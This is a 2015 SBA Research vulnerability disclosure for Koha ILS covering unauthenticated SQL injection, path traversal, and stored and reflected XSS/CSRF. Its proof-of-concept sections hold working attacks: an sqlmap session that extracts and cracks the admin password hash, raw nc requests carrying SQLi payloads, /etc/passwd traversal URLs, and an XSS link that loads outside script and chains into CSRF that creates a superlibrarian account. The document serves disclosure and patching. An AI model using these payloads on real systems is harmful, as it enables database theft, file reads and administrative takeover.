Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

2015.06.28
Risk: Medium
Local: No
Remote: Yes

=============================================================================================== SBA Research Vulnerability Disclosure =============================================================================================== title: Koha Unauthenticated SQL injection product: Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website: http://www.koha-community.org/ found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact: cst@sba-research.org References: http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/ http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 ?http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 =============================================================================================== ========================= 1. Mutiple SQL Injections ========================= + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + Vulnerability: -------------- The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. Impact: ------- By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the webserver is misconfigured, the file-system may be accessed as well. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412 # ################################################################################################## # # PoC: # # ################################################################################################## # 1. Inspect Koha database schema Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; 2. Query the database with sqlmap So let's fire up sqlmap with the --sql-shell parameter and input the query: root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:20:07 [09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' 3. Feed john the ripper and be lucky root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably root@kali:/home/wicked# john ./admin-pass --show ?:admin 1 password hash cracked, 0 left 4. Log in with username "admin" and password "admin" ;) # ################################################################################################## # # PoC End # # ################################################################################################## # + +++++++++++++++++++++++++++++++++++ + + b) SQL Injection in STAFF interface + + +++++++++++++++++++++++++++++++++++ + Vulnerability: -------------- An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's to read arbritrary data via the database due to improper input validation of the parameters Filter and Criteria. Impact: ------- By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible. References: ----------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426 # ################################################################################################## # # PoC: # # ################################################################################################## # ==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002 ==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ==================================================================== echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002 ==================================================================== You will notice different output in every second request, demonstrating the evaluation of the payload. # ################################################################################################## # # PoC End # # ################################################################################################## # ================================= 3. Path Traversal (CVE-2015-4633) ================================= Vulnerability ------------- The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. Impact ------ A remote attacker my read arbitrary files on the system. References ---------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 # ################################################################################################## # # PoC: # # ################################################################################################## # The following input is used to print out /etc/passwd: /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd # ################################################################################################## # # PoC End # # ################################################################################################## # ================================= 4. XSS and XSRF ================================= Vulnerability ------------- Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. The attack can be performed by: - through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633) - through a user clicking a malicious link (phishing mail, forum link etc.) The following pages are affected from stored XSS flaws: /cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl The following pages are affected from relfective XSS flaws: /cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to") Impact ---------- The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to: - escalate privileges by targeting staff members with XSRF - target users via browser exploits - target the webserver by combining with other server-side vulnerabilities. References ---------------- http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418 # ################################################################################################## # # PoC / Attack Scenario: # # ################################################################################################## # Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link: --> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0 Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens --> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example: Create new user: ----------------------- --> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1 Give the new user superlibririan permission: ---------------------------------------------------------- --> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian The attacker can now log as superlibrarian. Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists. # ################################################################################################## # # PoC / Attack Scenario End # # ################################################################################################## #

Referencje:

http://koha-community.org/security-release-koha-3-20-1/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top